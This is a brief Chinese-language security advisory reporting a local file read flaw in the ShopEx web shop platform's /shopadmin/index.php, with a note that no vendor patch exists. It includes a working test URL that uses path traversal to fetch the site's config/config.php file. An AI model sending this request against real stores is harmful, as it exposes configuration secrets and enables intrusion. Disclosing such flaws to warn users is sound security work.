ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统,
ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞漏洞预警
。index.php在对参数的处理过程中存在本地文件读取漏洞
测试代码:
http://myhack58.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.
php目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn